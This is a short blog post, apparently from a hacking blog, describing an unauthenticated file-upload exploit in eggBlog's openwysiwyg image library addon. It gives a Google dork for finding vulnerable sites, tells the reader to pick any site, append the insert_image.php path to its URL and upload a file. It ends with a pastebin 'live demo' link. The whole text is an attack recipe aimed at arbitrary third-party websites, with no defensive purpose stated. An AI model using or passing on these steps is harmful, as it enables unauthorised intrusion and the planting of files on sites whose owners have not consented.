"powered by eggBlog.net"
Exploit :
/_lib/openwysiwyg/addons/imagelibrary/insert_image.php?wysiwyg=
1- Copy the dork and paste on Google
2- Choose any site
Exploiting Target
1- Paste the exploit at the end of the URL.
Example:
www.site.com/index.php?id=12
become
www.site.com/_lib/openwysiwyg/addons/imagelibrary/insert_image.php?wysiwyg=
and you will see something like this
2- Choose your file and click Upload.
3- To view your file, simply click on your file name in the upper right box.
Live Demo: http://pastebin.com/Py0rcFWa
No comments:
Post a Comment